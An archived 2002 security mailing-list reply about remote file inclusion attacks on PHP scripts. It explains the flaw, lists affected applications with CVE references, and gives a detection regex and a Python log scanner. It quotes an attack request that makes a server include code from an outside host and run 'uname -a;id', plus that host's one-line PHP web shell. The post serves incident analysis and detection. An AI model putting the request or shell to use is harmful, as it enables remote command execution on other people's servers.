zeno <bugtraqat_private> said:

> I figured a few people may find this interesting.
>
> 200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
>
> contents of www.jtecx.hpg.com.br/jtec.txt
>
> ------------------- start snip
>
> <?php
> system($cmd);
> ?>
>
> ------------------- end snip

A number of PHP scripts have demonstrated this type of vulnerability, which was documented in "A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications" by Shaun Clowes; see http://www.securereality.com.au/studyinscarlet.txt (http://www.zend.com/zend/art/art-oertli.php also looks useful). This has been a topic of discussion on the webappsec list.

Basically, PHP can allow the programmer to access files from remote sites. PHP scripts that don't properly filter arguments to an "include" command can therefore have a remote URL injected by the attacker. PHP also allows request parameters (fields) to define variables inside the script. The combination of these factors makes it easy for an attacker to execute code in the vulnerable application. Note: this may be dependent on configuration and/or the PHP version.
Some vulnerable applications are:

BUGTRAQ:20001125 Security problems with TWIG webmail system
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2
(CVE: CVE-2000-1166)

BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2
(CVE: CAN-2002-0206)
[this could be the vulnerability being exploited in zeno's example]

BUGTRAQ:20020506 b2 php remote command execution
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2
(CVE: CAN-2002-0734)

BUGTRAQ:20020517 Phorum 3.3.2a remote command execution
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2
(CVE: CAN-2002-0764)

A generic Perl regular expression to catch some of these exploits is:

/\.php[2-9]?\?.*=http:\/\//

This seems to do a good job, although it could generate some false positives for valid PHP scripts that pass URLs as arguments, e.g. for redirecting the user out of the site.

- Steve

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
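The following is an added example, not part of Steve's post: it applies the regular expression above to access-log lines and, for each hit, decodes the query string so the analyst can see which parameter carries the remote URL. That extra step separates the false-positive case the post mentions (a redirect-style URL parameter) from a file/include parameter pointing at a remote host. The log lines other than the one quoted from zeno are constructed; the function names are the example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The Perl expression from the post, in Python's (compatible) regex syntax.
RFI_PATTERN = re.compile(r'\.php[2-9]?\?.*=http://')

# Just enough of the Combined Log Format to recover the request target and status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) ')


def remote_url_params(target):
    """Return [(name, value)] for query parameters whose decoded value is an http(s) URL."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if re.match(r'(?i)https?://', v)]


def scan_access_log(lines):
    """Return one finding per request flagged by the post's regex.

    Each finding carries the decoded remote-URL parameters so a reviewer can
    tell a file/include parameter aimed at a remote host apart from a
    legitimate URL-valued parameter such as a redirect target.
    """
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                      # not a well-formed access-log line
        target = m.group('target')
        if not RFI_PATTERN.search(target):
            continue                      # regex did not fire
        findings.append({
            'ip': m.group('ip'),
            'target': target,
            'status': int(m.group('status')),
            'remote_params': remote_url_params(target),
        })
    return findings


# Constructed sample log: the request quoted in the post, a legitimate redirect
# parameter (a false positive for the regex), and an ordinary request.
SAMPLE_LOG = [
    '200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"',
    '192.0.2.7 - - [14/Sep/2002:16:50:01 -0400] "GET /redirect.php?url=http://www.example.com/ HTTP/1.0" 302 0 "-" "Mozilla/4.0"',
    '192.0.2.8 - - [14/Sep/2002:16:51:12 -0400] "GET /index.php?file=about HTTP/1.0" 200 1024 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f['ip'], f['status'], f['remote_params'])
```

Which parameter names count as "include-like" is application specific, so the example reports the decoded parameters rather than deciding for you.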
This archive was generated by hypermail 2b30 : Thu Sep 19 2002 - 08:50:11 PDT